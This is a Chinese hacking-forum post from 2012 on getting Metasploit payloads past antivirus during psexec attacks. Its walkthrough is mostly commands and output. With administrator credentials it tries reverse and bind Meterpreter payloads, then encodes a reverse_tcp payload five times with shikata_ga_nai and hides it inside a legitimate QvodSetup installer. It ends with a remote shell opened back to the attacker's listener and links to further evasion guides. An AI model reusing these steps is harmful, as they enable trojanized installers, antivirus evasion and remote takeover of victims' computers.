切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
380 远程payload的Bypass[复制链接]
发表于 2012-12-30 01:09:30 | 显示全部楼层 |!read_mode!

What is a payload?如官方所说的:
A payload is the piece of software that lets you control a computer system after it’s been exploited. The payload is typically attached to and delivered by the exploit. Just imagine an exploit that carries the payload in its backpack when it breaks into the system and then leaves the backpack there. Yes, it’s a corny description, but you get the picture.

Metasploit’s most popular payload is called Meterpreter, which enables you to do all sorts of funky stuff on the target system. For example, you can upload and download files from the system, take screenshots, and collect password hashes. You can even take over the screen, mouse, and keyboard to fully control the computer. If you’re feeling particularly bad-ass, you can even turn on a laptop’s webcam and be a fly on the wall.

对应本地和网页网页类型的都有很多绕过安全软件的方法,如对应win7的 powershell ,对于java的java_signed_applet ,浏览器漏洞的 免杀 和生成exe等等文件的msfpayload

对应远程的payload呢?现在的PC或者SERVER,很少见不装安全软件的。
例如一个psexec,当知道对方帐号密码后能获得一个SHELL 当写入配置后 写入 PAYLOAD


  1. msf  exploit(psexec) > set PAYLOAD windows/meterpreter/reverse_tcp
  2. PAYLOAD => windows/meterpreter/reverse_tcp
复制代码


执行


没如预料,获得SHELL?什么原因? 大部分是杀毒杀了



换个PAYLOAD试试


  1. msf  exploit(psexec) > set PAYLOAD windows/meterpreter/bind_tcp
  2. PAYLOAD => windows/meterpreter/bind_tcp
  3. msf  exploit(psexec) > exploit

  4. [*] Connecting to the server...
  5. [*] Started bind handler
  6. [*] Authenticating to 5.5.5.4:445|WORKGROUP as user 'administrator'...
  7. [*] Uploading payload...
  8. [*] Created \lJGSOEfc.exe...
  9. [*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:5.5.5.4[\svcctl] ...
  10. [*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:5.5.5.4[\svcctl] ...
  11. [*] Obtaining a service manager handle...
  12. [*] Creating a new service (GkoJyXLg - "MoAih")...
  13. [*] Closing service handle...
  14. [*] Opening service...
  15. [*] Starting the service...
  16. [-] Error: execution expired
复制代码

也不行,这个时候可以试试windows/download_exec_https 和 windows/download_exec_https 试试,但是EXE核VBS不免杀也是一样的结果。。
为了取得一个暂时的SHELL 可以这样


  1. root@Pc:/tmp# msfpayload windows/meterpreter/reverse_tcp LHOST=5.5.5.1 LPORT=4444 R | msfencode -t exe -x /tmp/QvodSetup5.exe -k -o brk.exe -e x86/shikata_ga_nai -c 5
  2. [*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)

  3. [*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)

  4. [*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)

  5. [*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)

  6. [*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)

  7. root@Pc:/tmp# file brk.exe
  8. brk.exe: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
  9. root@Pc:/tmp#
复制代码

设置漏洞利用


  1. msf  exploit(psexec) > set EXE::Custom /tmp/brk.exe
  2. EXE::Custom => /tmp/brk.exe
复制代码

利用


  1. msf  exploit(psexec) > exploit

  2. [*] Started reverse handler on 5.5.5.1:4444
  3. [*] Connecting to the server...
  4. [*] Authenticating to 5.5.5.4:445|WORKGROUP as user 'administrator'...
  5. [*] Uploading payload...
  6. [*] Using custom executable /tmp/brk.exe, RHOST and RPORT settings will be ignored!
  7. [*] Created \rvUEPiZp.exe...
  8. [*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:5.5.5.4[\svcctl] ...
  9. [*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:5.5.5.4[\svcctl] ...
  10. [*] Obtaining a service manager handle...
  11. [*] Creating a new service (cazeVsDU - "MvmIaTXVREiiMlcePrzIFKpp")...
  12. [*] Closing service handle...
  13. [*] Opening service...
  14. [*] Starting the service...
  15. [*] Sending stage (752128 bytes) to 5.5.5.4
  16. [*] Meterpreter session 1 opened (5.5.5.1:4444 -> 5.5.5.4:1369) at 2012-12-04 19:19:49 +0800
复制代码

发现获得了SHELL 快播也在运行了


这只是一个列子 你可以通过set EXE::Custom 设置你的免杀后门
关于免杀参考:
http://fuzzexp.org/porting-the-public-exploits-to-metasploit.html
http://fuzzexp.org/msfpayload-and-msfencode-with-metasploit.html
http://fuzzexp.org/how-to-bypass-antivirus-with-metasploit.html
http://fuzzexp.org/msfpayload-script-msfpayload-generator-script.html





操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2019-12-14 10:47

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部